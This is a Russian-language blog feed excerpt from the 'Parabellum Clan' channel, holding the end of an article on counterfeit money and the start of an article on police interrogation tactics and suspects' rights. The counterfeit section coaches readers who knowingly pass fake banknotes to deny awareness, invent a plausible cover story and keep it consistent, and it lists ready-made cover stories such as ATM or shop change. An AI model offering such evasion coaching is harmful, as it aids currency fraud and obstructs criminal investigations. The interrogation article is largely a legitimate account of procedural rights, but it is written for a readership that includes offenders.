  &lt;p id=&quot;oI5g&quot;&gt;Расследование преступлений, связанных с &lt;strong&gt;организованными преступными группами&lt;/strong&gt;, требует тесной работы следователей с оперативными подразделениями. Без оперативно-тактических мер, таких как &lt;strong&gt;внедрение агентов в преступную среду&lt;/strong&gt;, собрать доказательства &lt;strong&gt;исключительно следственными методами почти невозможно&lt;/strong&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;pzAe&quot;&gt;&lt;strong&gt;Пример успешной операции&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;lFKg&quot;&gt;В ДЭБ МВД России поступила информация о появлении в московских магазинах &lt;strong&gt;фальшивых купюр&lt;/strong&gt;. Через оперативные источники удалось выйти на сбытчиков, продававших поддельные &lt;strong&gt;100- и 1000-рублёвые банкноты&lt;/strong&gt;. Один из оперативников, &lt;strong&gt;выдав себя за скупщика&lt;/strong&gt;, договорился на сделку на &lt;strong&gt;230 тысяч рублей&lt;/strong&gt;. &lt;strong&gt;При передаче фальшивок&lt;/strong&gt; преступников задержали. Оказалось, что сбытчиками были &lt;strong&gt;уроженцы Азербайджана&lt;/strong&gt;, а купюры &lt;strong&gt;были очень высокого качества&lt;/strong&gt;, изготовленные на профессиональном оборудовании. Оперативники продолжают поиск &lt;strong&gt;печатного станка&lt;/strong&gt;, на котором были изготовлены подделки.&lt;/p&gt;
  &lt;section&gt;
    &lt;h2 id=&quot;NCfU&quot;&gt;7. Рекомендации к защите, при обвинении в подделке купюр&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;4LbN&quot;&gt;В России &lt;strong&gt;фальшивомонетничество&lt;/strong&gt; регулируется &lt;strong&gt;статьёй &lt;a href=&quot;https://www.consultant.ru/document/cons_doc_LAW_10699/a102e84cc9f4d4ebfb14bbd474c1bbdaaf4cb1bf/&quot; target=&quot;_blank&quot;&gt;186 УК РФ –изготовление, хранение, перевозка или сбыт поддельных денег или ценных бумаг, &lt;/a&gt;&lt;/strong&gt;и наказывается сроком до 15 лет, что очень сильно пугает новоиспечённых фальшивомонетчиков.&lt;/p&gt;
  &lt;p id=&quot;NANr&quot;&gt;Если вы &lt;strong&gt;осознанно купили фальшивые деньги&lt;/strong&gt; с целью их сбыта – это преступление, но избежать наказания вы всё же можете, съехав на то, что вы не знали, что она поддельная, в таком случае состава преступления нет:&lt;/p&gt;
  &lt;h3 id=&quot;HROe&quot;&gt;&lt;strong&gt;Что делать, если вас поймали с фальшивкой?&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;Iw4z&quot;&gt;
    &lt;li id=&quot;7knK&quot;&gt;&lt;strong&gt;Не признавайтесь, что знали о подделке.&lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;b9MK&quot;&gt;&lt;strong&gt;Будьте спокойны и не паникуйте.&lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;mE6c&quot;&gt;&lt;strong&gt;Придумайте правдоподобную версию, как купюра оказалась у вас.&lt;/strong&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;rPL0&quot;&gt;&lt;strong&gt;Возможные версии происхождения купюры:&lt;/strong&gt;&lt;/h3&gt;
  &lt;ol id=&quot;CZXS&quot;&gt;
    &lt;li id=&quot;N6Cz&quot;&gt;&lt;strong&gt;Сдача в магазине&lt;/strong&gt; – вы могли получить поддельную купюру при расчёте в супермаркете, кафе или на заправке.&lt;/li&gt;
    &lt;li id=&quot;0mdW&quot;&gt;&lt;strong&gt;Банкомат&lt;/strong&gt; – купюра могла поступить вам через банкомат, так как даже банки иногда не выявляют подделки.&lt;/li&gt;
    &lt;li id=&quot;ZR5m&quot;&gt;&lt;strong&gt;Рынок или ярмарка&lt;/strong&gt; – часто расчёты ведутся наличными, и проверить каждую купюру на подлинность на месте сложно.&lt;/li&gt;
    &lt;li id=&quot;C5Ma&quot;&gt;&lt;strong&gt;Оплата за товар или услугу&lt;/strong&gt; – если вам расплатились наличными за проданный телефон, услуги ремонта или сдачу жилья.&lt;/li&gt;
    &lt;li id=&quot;qL7E&quot;&gt;&lt;strong&gt;Деньги от незнакомца&lt;/strong&gt; – могли получить сдачу или разменять купюру у случайного человека.&lt;/li&gt;
    &lt;li id=&quot;DP21&quot;&gt;&lt;strong&gt;Перевод денег через третьих лиц&lt;/strong&gt; – если получили наличные через посредников (например, при продаже товаров с рук).&lt;/li&gt;
    &lt;li id=&quot;LdqU&quot;&gt;&lt;strong&gt;Подарок или выигрыш&lt;/strong&gt; – получили деньги от родственника, знакомого или в качестве приза в неофициальной лотерее.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;blockquote id=&quot;bTgG&quot;&gt;*С крупными купюрами по типу 5000 прокатят отнюдь не все версии*&lt;/blockquote&gt;
  &lt;h3 id=&quot;K3w6&quot;&gt;&lt;strong&gt;Как не попасть под подозрение?&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;uBpQ&quot;&gt;
    &lt;li id=&quot;COtd&quot;&gt;Спокойно заявите, что &lt;strong&gt;не знали о подделке&lt;/strong&gt; и просто использовали купюру, как любую другую.&lt;/li&gt;
    &lt;li id=&quot;m4jO&quot;&gt;Убедительно расскажите свою версию, не меняя её в ходе допроса.&lt;/li&gt;
    &lt;li id=&quot;U6df&quot;&gt;Если купюру обнаружили в банке или магазине – &lt;strong&gt;проявите заинтересованность&lt;/strong&gt; в расследовании и скажите, что тоже хотите знать, кто вас мог обмануть.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;1w38&quot;&gt;Сам по себе факт передачи фальшивой купюры без доказанного факта того, что лицо заведомо знало о факте фальшивости, не образует состава преступления. Прямой умысел в совершении преступления должен быть доказан органами следствия.&lt;/p&gt;
  &lt;p id=&quot;p4gz&quot;&gt;На действительности эта статья применяется довольно редко из-за грамотно выстроенной линии защиты, которая позволяет съехать на то, что вы не изготавливали купюру, так как не имели нужных навыков или не знали, что она фальшивая, однако, если вы настолько глупы, что в момент вашего задержания у вас дома лежали трафареты или уже отпечатанные купюры - то вам пизда)&lt;/p&gt;

</content></entry><entry><id>parabellum_clan:Dopros_manipulyacii</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/Dopros_manipulyacii?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>Допрос и манипуляции: как не стать жертвой системы?</title><published>2025-06-17T09:36:45.148Z</published><updated>2025-06-17T09:36:45.148Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/3e/34/3e34d161-657c-44c2-ba6d-43811ac995b4.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/0f/d4/0fd4953b-bfc7-498e-b7de-d078d5bd2174.png&quot;&gt;Доброго вечера, коллеги! С вами, как всегда, Parabellum Clan! Сегодняшняя тема затрагивает сложные, но актуальные вопросы — методы допроса и способы противодействия психологическим приемам следователя. Психологическое давление, скрытые манипуляции, неформальные тактики — все это используется, чтобы вывести подозреваемого или свидетеля из равновесия и добиться нужных показаний. В этой статье мы рассмотрим, как грамотно распознать такие приемы, сохранить самообладание и защитить свои права.</summary><content type="html">
  &lt;figure id=&quot;mYqH&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0f/d4/0fd4953b-bfc7-498e-b7de-d078d5bd2174.png&quot; width=&quot;2880&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;C9S2&quot;&gt;Доброго вечера, коллеги! С вами, как всегда, &lt;a href=&quot;https://t.me/+ize7XDFxbMNjNDg0&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Parabellum Clan!&lt;/strong&gt;&lt;/a&gt; Сегодняшняя тема затрагивает сложные, но актуальные вопросы — методы допроса и способы противодействия психологическим приемам следователя. Психологическое давление, скрытые манипуляции, неформальные тактики — все это используется, чтобы вывести подозреваемого или свидетеля из равновесия и добиться нужных показаний. В этой статье мы рассмотрим, как грамотно распознать такие приемы, сохранить самообладание и защитить свои права.&lt;/p&gt;
  &lt;p id=&quot;Pa3Z&quot;&gt;&lt;strong&gt;Содержание: &lt;/strong&gt;&lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#2kmm&quot;&gt;0. Права допрашиваемого: правовые и практические аспекты&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#ZIsB&quot;&gt; 1. Психологические механизмы воздействия в допросе&lt;/a&gt;&lt;br /&gt; &lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#Jm00&quot;&gt;2. Методы дезориентации и манипуляции временем&lt;/a&gt;&lt;br /&gt; &lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#SeDG&quot;&gt;3. Создание ложного ощущения безопасности&lt;/a&gt;&lt;br /&gt; &lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#fe4l&quot;&gt;4. Методы запугивания и использования неявных угроз&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#HUCd&quot;&gt; 5. Наведение и внушение: вербальные и невербальные приемы&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#xaOP&quot;&gt; 6. Методы использования информации против допрашиваемого&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#8aji&quot;&gt; 7. Эмоциональное давление через воспоминания и личные переживания&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#IASX&quot;&gt; 8. Сложные многослойные вопросы и использование логических ловушек&lt;/a&gt;&lt;br /&gt; &lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#jFZS&quot;&gt;9. Распознавание и фиксация неправомерного давления&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#PqSe&quot;&gt; 10. Особые случаи: видеозапись и другие способы фиксации допроса&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#HiQy&quot;&gt; 11. Система &amp;quot;П.Л.О.Д.&amp;quot;&lt;/a&gt;&lt;br /&gt; &lt;a href=&quot;/@parabellumclan/nOEe3-sLW7a#XywD&quot;&gt;12. Советы для подготовки к допросу&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;2kmm&quot; data-align=&quot;center&quot;&gt;0. Права допрашиваемого: правовые и практические аспекты&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;GuGq&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/57/e6/57e6de72-5966-4659-8a50-01fcc879e1f7.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;qOZL&quot;&gt;В рамках прав допрашиваемого законодательство РФ предоставляет множество инструментов, позволяющих минимизировать риск неправомерного воздействия со стороны следствия. Рассмотрим более детально, на чем основаны и как защищены права допрашиваемого:&lt;/p&gt;
  &lt;h3 id=&quot;kDJU&quot;&gt;1. &lt;strong&gt;Право на защиту и присутствие адвоката&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;mRyD&quot;&gt;
    &lt;li id=&quot;RKDO&quot;&gt;&lt;strong&gt;Конституция РФ (статья 48)&lt;/strong&gt; закрепляет право каждого гражданина на квалифицированную юридическую помощь с момента фактического задержания или привлечения в качестве подозреваемого. Это право детализируется в &lt;strong&gt;статье 16 УПК РФ&lt;/strong&gt;, где говорится, что защита является обязательным элементом для всех участников уголовного процесса.&lt;/li&gt;
    &lt;li id=&quot;znJ1&quot;&gt;&lt;strong&gt;Статья 50 УПК РФ&lt;/strong&gt; обязывает следователя незамедлительно уведомить адвоката, если допрашиваемый требует его участия. При этом допрашиваемый вправе требовать перерывы для консультации с защитником и не обязан отвечать на вопросы, пока защитник не окажет необходимую поддержку.&lt;/li&gt;
    &lt;li id=&quot;F5Wt&quot;&gt;&lt;strong&gt;Статья 53 УПК РФ&lt;/strong&gt; предоставляет адвокату право участвовать во всех следственных действиях, защищать законные интересы допрашиваемого, заявлять ходатайства и подавать жалобы на действия следователя.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;C6NN&quot;&gt;2. &lt;strong&gt;Право на отказ от дачи показаний&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;z2Cw&quot;&gt;
    &lt;li id=&quot;qMhW&quot;&gt;&lt;strong&gt;Статья 51 Конституции РФ&lt;/strong&gt; гарантирует, что гражданин не обязан свидетельствовать против себя и своих близких, в том числе супруга и родственников. Это конституционное право помогает избежать самооговора и позволяет отказаться от ответов на вопросы, которые могут быть направлены на самообвинение.&lt;/li&gt;
    &lt;li id=&quot;BcWH&quot;&gt;В соответствии с &lt;strong&gt;статьей 190 УПК РФ&lt;/strong&gt;, отказ от дачи показаний не может быть истолкован в качестве подтверждения вины или использоваться против допрашиваемого.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;gQRB&quot;&gt;3. &lt;strong&gt;Право на уважительное и гуманное обращение&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;j0A8&quot;&gt;
    &lt;li id=&quot;79HB&quot;&gt;&lt;strong&gt;Статья 21 Конституции РФ&lt;/strong&gt; запрещает пытки, насилие и унижение достоинства личности. Это право усиливается &lt;strong&gt;статьей 9 УПК РФ&lt;/strong&gt;, согласно которой обращение с участниками процесса должно быть уважительным и не должно причинять физическое или психическое страдание.&lt;/li&gt;
    &lt;li id=&quot;H7cN&quot;&gt;Любое нарушение данного положения, например, унижение или оскорбление, может быть обжаловано и служит основанием для привлечения к ответственности сотрудников, допустивших нарушения.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;SWl1&quot;&gt;4. &lt;strong&gt;Право на ознакомление со своими правами и процессуальными документами&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;q9GU&quot;&gt;
    &lt;li id=&quot;LHct&quot;&gt;&lt;strong&gt;Статья 11 УПК РФ&lt;/strong&gt; закрепляет, что следователь обязан разъяснить допрашиваемому его права перед началом допроса. Это право защищает допрашиваемого от произвола и позволяет ему осознанно использовать свои права в ходе следственных действий.&lt;/li&gt;
    &lt;li id=&quot;gB4K&quot;&gt;Допрашиваемый вправе ознакомиться с протоколами и другими документами, составленными в ходе допроса, и в случае несогласия подписывать их с замечаниями. Данное право является основой для защиты от искажения или неправильной интерпретации показаний.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;rMMZ&quot;&gt;5. &lt;strong&gt;Право на фиксирование нарушений и обжалование действий следователя&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;pRLX&quot;&gt;
    &lt;li id=&quot;OHPJ&quot;&gt;&lt;strong&gt;Статья 125 УПК РФ&lt;/strong&gt; предоставляет возможность обжаловать действия и решения следователя в суде, если допрашиваемый считает, что его права нарушены. Жалоба подается непосредственно в суд и рассматривается в кратчайшие сроки.&lt;/li&gt;
    &lt;li id=&quot;HObJ&quot;&gt;Согласно &lt;strong&gt;статье 75 УПК РФ&lt;/strong&gt;, показания, полученные в результате неправомерного воздействия, признаются недопустимыми и не могут использоваться в суде. Это положение защищает от незаконного принуждения и гарантирует, что доказательства, добытые с нарушением прав, не будут использованы против допрашиваемого.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;oQP0&quot;&gt;6. &lt;strong&gt;Право на сохранение тайны адвокатских консультаций&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;VL1U&quot;&gt;
    &lt;li id=&quot;C2aQ&quot;&gt;В соответствии с &lt;strong&gt;статьей 16 УПК РФ&lt;/strong&gt; и &lt;strong&gt;статьей 48 Конституции РФ&lt;/strong&gt;, адвокатские консультации являются конфиденциальными и не могут быть использованы против допрашиваемого. Это право исключает возможность следователя прослушивать или записывать разговоры между адвокатом и допрашиваемым, сохраняя тайну подготовки к защите.&lt;/li&gt;
    &lt;li id=&quot;PTSK&quot;&gt;&lt;strong&gt;Статья 86 УПК РФ&lt;/strong&gt; позволяет адвокату собирать доказательства для защиты своего подзащитного, что может включать опрос свидетелей, сбор информации и привлечение специалистов. Эти материалы могут быть использованы в защиту допрашиваемого, создавая дополнительные доказательства его невиновности или неправомерного давления.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;e6vv&quot;&gt;7. &lt;strong&gt;Право на отказ от самооговора и наведения&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;T7Nu&quot;&gt;
    &lt;li id=&quot;zvso&quot;&gt;&lt;strong&gt;Статья 189 УПК РФ&lt;/strong&gt; прямо запрещает следователю задавать наводящие вопросы, которые могут подтолкнуть допрашиваемого к самооговору. Допрашиваемый имеет полное право не отвечать на такие вопросы и заявлять о нарушении.&lt;/li&gt;
    &lt;li id=&quot;QTM3&quot;&gt;&lt;strong&gt;Статья 286 УК РФ&lt;/strong&gt; предусматривает уголовную ответственность для должностных лиц, превышающих свои полномочия, включая применение незаконных методов допроса. Нарушение этого права может служить основанием для подачи жалобы и возбуждения уголовного дела против следователя.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;kCrt&quot;&gt;8. &lt;strong&gt;Право на компенсацию морального и материального вреда&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;1rOb&quot;&gt;
    &lt;li id=&quot;9SWC&quot;&gt;&lt;strong&gt;Статья 151 Гражданского кодекса РФ&lt;/strong&gt; позволяет требовать компенсацию за моральный вред, причиненный незаконными действиями следователя, такими как давление, угрозы или унижение. Моральный вред может выражаться в психических страданиях, вызванных нарушением прав.&lt;/li&gt;
    &lt;li id=&quot;uRG8&quot;&gt;&lt;strong&gt;Статья 1064 ГК РФ&lt;/strong&gt; также предусматривает возмещение убытков, возникших в результате незаконных действий следователя. Если допрашиваемому был нанесен вред имуществу, здоровью или репутации, он может требовать компенсацию через гражданский иск.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;4e50&quot;&gt;Безусловно, необходимо помнить о специфике правоприменения в нашем сегменте мира, где права человека, особенно в ходе допросов, могут многократно нарушаться. На практике, несмотря на обязательное протоколирование всех действий и вопросов, возможны ситуации, когда факты психологического давления или других неправомерных действий следователя не попадают в протокол. В таких случаях крайне важно сразу сослаться на свои права и потребовать фиксации нарушений, заполнив необходимые заявления и жалобы.&lt;/p&gt;
  &lt;p id=&quot;EzXA&quot;&gt;Отдельное внимание стоит уделить выбору адвоката. &lt;strong&gt;Пользоваться услугами государственного защитника в большинстве случаев не рекомендуется&lt;/strong&gt;: в СНГ их работа зачастую направлена не на защиту интересов клиента, а на сотрудничество со следствием. Такой адвокат может способствовать принуждению к самооговору или «закрывать глаза» на нарушения. Это простые, но жизненно важные правила, которые часто игнорируют, полагая, что «так принято».&lt;/p&gt;
  &lt;p id=&quot;E3Mr&quot;&gt;К сожалению, именно пренебрежение этими рекомендациями нередко приводит к серьезным последствиям, в том числе к длительным срокам лишения свободы.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;ZIsB&quot; data-align=&quot;center&quot;&gt;1. Психологические механизмы воздействия в допросе&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;jsW4&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/12/14/12141847-3104-40c3-a8b7-55d2562a9890.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;NEeK&quot;&gt;Психологическое воздействие — основной инструмент, которым следователь пользуется, чтобы получить информацию или признание от допрашиваемого. Важная особенность допроса в том, что он всегда сопровождается психологическим влиянием, будь то через прямые вопросы или косвенные манипуляции. Это делает понимание психологических приемов и методов важной составляющей для защиты.&lt;/p&gt;
  &lt;h4 id=&quot;Z49w&quot;&gt;Что такое психическое воздействие?&lt;/h4&gt;
  &lt;p id=&quot;DRgN&quot;&gt;В любом общении между следователем и подозреваемым всегда присутствует психологическое влияние. Исследования показывают, что «всякое воздействие на личность, вербальное — невербальное, непосредственное — опосредованное является психическим». Следователь передает информацию, чтобы вызвать определенную реакцию у допрашиваемого. Это может проявляться в виде ответов, эмоций и поведения, которые становятся понятны и доступны следователю.&lt;/p&gt;
  &lt;h4 id=&quot;zfHf&quot;&gt;Влияние и манипуляция как приемы&lt;/h4&gt;
  &lt;p id=&quot;WAmh&quot;&gt;Влияние, как объясняет Д.А. Зарайский, — это изменение состояния, намерений, эмоций и поведения человека. Следователь может использовать различные приемы, чтобы «подстроить» состояние допрашиваемого: например, вызвать чувство вины или страха, усилить доверие или вызвать сомнения. Такой подход позволяет следователю создать подходящую обстановку, в которой допрашиваемый будет склонен к определенному поведению.&lt;/p&gt;
  &lt;h4 id=&quot;e7Nv&quot;&gt;Формирование «психологического пространства» на допросе&lt;/h4&gt;
  &lt;p id=&quot;Ch2j&quot;&gt;Взаимодействие между следователем и допрашиваемым создает особое пространство, где все — от невербальных жестов до тона речи — может быть направлено на достижение нужного результата. Это пространство называется «психологическим пространством взаимодействия», где каждая деталь взаимодействия организована и контролируется следователем. Следователь строит общение так, чтобы на каждом этапе вести допрашиваемого к нужному результату, будь то информация или признание.&lt;/p&gt;
  &lt;h4 id=&quot;qKBz&quot;&gt;Правомерное и неправомерное психическое воздействие&lt;/h4&gt;
  &lt;p id=&quot;3ebY&quot;&gt;Психологическое давление может быть как правомерным, так и незаконным. Важно, чтобы следователь соблюдал правила: сохранял свободу выбора допрашиваемого и не заставлял его отвечать определенным образом. Как указывает А.В. Дулов, при правомерном воздействии «должна не только сохраняться свобода выбора занимаемой позиции, но и дополнительно должны создаваться стимулы для изложения своей позиции». То есть следователь должен лишь задавать вопросы, но не подталкивать к самооговору. Это критически важно, так как если допрашиваемый под давлением признается в том, чего он не делал, такие показания могут быть исключены из дела как недействительные.&lt;/p&gt;
  &lt;h4 id=&quot;kFI9&quot;&gt;Принципы правомерного воздействия&lt;/h4&gt;
  &lt;p id=&quot;zcf2&quot;&gt;Чтобы психическое воздействие считалось правомерным, следователь должен соблюдать следующие условия:&lt;/p&gt;
  &lt;ul id=&quot;yXNq&quot;&gt;
    &lt;li id=&quot;98rH&quot;&gt;&lt;strong&gt;Законность&lt;/strong&gt;. Все действия следователя должны соответствовать закону.&lt;/li&gt;
    &lt;li id=&quot;Ltap&quot;&gt;&lt;strong&gt;Свобода выбора допрашиваемого&lt;/strong&gt;. Допрашиваемый должен иметь возможность выбирать, как и что отвечать.&lt;/li&gt;
    &lt;li id=&quot;LDa4&quot;&gt;&lt;strong&gt;Создание условий для выражения своей позиции&lt;/strong&gt;. Следователь обязан обеспечить спокойную обстановку для выражения допрашиваемым своей позиции.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;hyZA&quot;&gt;Если эти условия нарушаются, то воздействие становится неправомерным. Следователь может оказывать скрытое или явное давление, что ставит допрашиваемого в уязвимое положение.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;Jm00&quot; data-align=&quot;center&quot;&gt;2. Методы дезориентации и манипуляции временем&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;8ykX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c4/f2/c4f23c70-d1d1-44d5-b39e-b0b66a707cbe.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;UYTv&quot;&gt;Эти методы основаны на создании физического и ментального дискомфорта, чтобы сбить допрашиваемого с толку, истощить его внимание и снизить способность к критическому мышлению.&lt;/p&gt;
  &lt;h4 id=&quot;XqAi&quot;&gt;Дезориентация через изоляцию и затягивание времени&lt;/h4&gt;
  &lt;p id=&quot;goTh&quot;&gt;В предоставленной литературе отмечается, что дезориентация может происходить, когда допрашиваемого оставляют в состоянии ожидания или изоляции на длительное время. Это нарушает его чувство времени и создает ощущение бессилия. В таких условиях человек может начать сомневаться в собственных мыслях и позициях, что делает его более уязвимым к манипуляциям следователя.&lt;/p&gt;
  &lt;p id=&quot;LyOv&quot;&gt;Пример: допрашиваемый может быть вынужден ожидать начала допроса часами, при этом ему не предоставляют информации о продолжительности ожидания. Это вызывает чувство беспокойства и раздражения, что впоследствии снижает его способность эффективно сопротивляться давлению.&lt;/p&gt;
  &lt;h4 id=&quot;DdSi&quot;&gt;Манипуляция временем как инструмент давления&lt;/h4&gt;
  &lt;p id=&quot;hKhU&quot;&gt;Еще один метод — это сознательное затягивание допроса, что вызывает физическую и ментальную усталость. Как говорится в источниках, «прямое и косвенное воздействие через длительное ожидание нарушает восприятие времени», что может привести к снижению концентрации и внимательности допрашиваемого. В таких условиях он может дать признательные показания просто из-за желания быстрее закончить допрос.&lt;/p&gt;
  &lt;h4 id=&quot;0ZsP&quot;&gt;Способы противодействия манипуляции временем&lt;/h4&gt;
  &lt;p id=&quot;Q6cc&quot;&gt;Для защиты от таких приемов важно осознавать право требовать разумные перерывы и фиксировать время, проведенное в ожидании или на допросе. Данное право предоставляется уголовно-процессуальным законом, и его можно использовать для восстановления психологической устойчивости и физической энергии.&lt;/p&gt;
  &lt;p id=&quot;wvs6&quot;&gt;В случаях затягивания допроса рекомендуется:&lt;/p&gt;
  &lt;ul id=&quot;TQ3L&quot;&gt;
    &lt;li id=&quot;OIzq&quot;&gt;Запрашивать перерывы и доступ к воде и пище, если допрос длится долго.&lt;/li&gt;
    &lt;li id=&quot;ET4o&quot;&gt;Внутренне фиксировать, сколько времени проходит, чтобы не потерять чувство реальности.&lt;/li&gt;
    &lt;li id=&quot;pBc2&quot;&gt;Сохранять спокойствие и не поддаваться давлению, которое может возникнуть из-за затянутости допроса.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;SeDG&quot; data-align=&quot;center&quot;&gt;3. Создание ложного ощущения безопасности&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;H8GG&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/26/1c/261cdc79-cb8e-4fe8-b2d6-b132f3ffbb69.png&quot; width=&quot;1928&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;v5ij&quot;&gt;Этот метод позволяет следователю установить кажущееся доверительное общение, которое ослабляет бдительность допрашиваемого и побуждает его раскрыть больше информации, чем он намеревался.&lt;/p&gt;
  &lt;h4 id=&quot;XkGi&quot;&gt;Как создается ложное ощущение безопасности&lt;/h4&gt;
  &lt;p id=&quot;SiWV&quot;&gt;Следователь может использовать различные приемы для создания видимости поддержки и понимания. Как указывается в предоставленных источниках, контакт между следователем и подозреваемым «нацелен на формирование психологического пространства взаимодействия», где следователь организует и контролирует все элементы общения, чтобы вызвать нужную реакцию. Следователь может казаться сочувствующим, дружелюбным и готовым «помочь», создавая у допрашиваемого иллюзию, что тот находится в безопасной и доверительной среде.&lt;/p&gt;
  &lt;p id=&quot;ocgE&quot;&gt;Пример таких приемов включает:&lt;/p&gt;
  &lt;ul id=&quot;Pdtk&quot;&gt;
    &lt;li id=&quot;ojXi&quot;&gt;&lt;strong&gt;Предоставление ложной информации о «возможных смягчающих обстоятельствах»&lt;/strong&gt;: следователь может намекнуть, что, «сотрудничая», допрашиваемый избежит серьезных последствий.&lt;/li&gt;
    &lt;li id=&quot;oi6u&quot;&gt;&lt;strong&gt;Создание атмосферы доверия через личные беседы&lt;/strong&gt;: следователь может задавать вопросы о семье, хобби или личных интересах, чтобы показать, что ему «не безразличен» допрашиваемый.&lt;/li&gt;
    &lt;li id=&quot;nu4k&quot;&gt;&lt;strong&gt;Демонстрация понимания и сочувствия&lt;/strong&gt;: следователь может утверждать, что «понимает» ситуацию допрашиваемого, выражая кажущееся сочувствие.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h4 id=&quot;dNku&quot;&gt;Опасности ложного чувства безопасности&lt;/h4&gt;
  &lt;p id=&quot;WerS&quot;&gt;Когда допрашиваемый начинает верить в то, что следователь на его стороне, он может неосознанно раскрыть больше информации или признаться в деталях, которые ранее хотел скрыть. Как подчеркивается в литературе, «влияние выступает в виде процесса передачи информации… способной вызвать соответствующую реакцию». В данном случае реакция заключается в том, что допрашиваемый раскрывается перед следователем, чувствуя себя в безопасности.&lt;/p&gt;
  &lt;h4 id=&quot;yLlB&quot;&gt;Способы противодействия&lt;/h4&gt;
  &lt;p id=&quot;Y0kz&quot;&gt;Для защиты от этого метода важно сохранять критическое восприятие всей информации, предоставляемой следователем. Даже если следователь кажется дружелюбным или сочувствующим, нужно помнить, что его главная цель — получить показания.&lt;/p&gt;
  &lt;p id=&quot;3xdp&quot;&gt;Советы для противодействия включают:&lt;/p&gt;
  &lt;ul id=&quot;CMhY&quot;&gt;
    &lt;li id=&quot;qVvb&quot;&gt;Сохранять формальный тон общения и избегать подробного обсуждения личных тем.&lt;/li&gt;
    &lt;li id=&quot;TKHY&quot;&gt;Постоянно напоминать себе, что любая информация, которую вы сообщаете, может быть использована против вас.&lt;/li&gt;
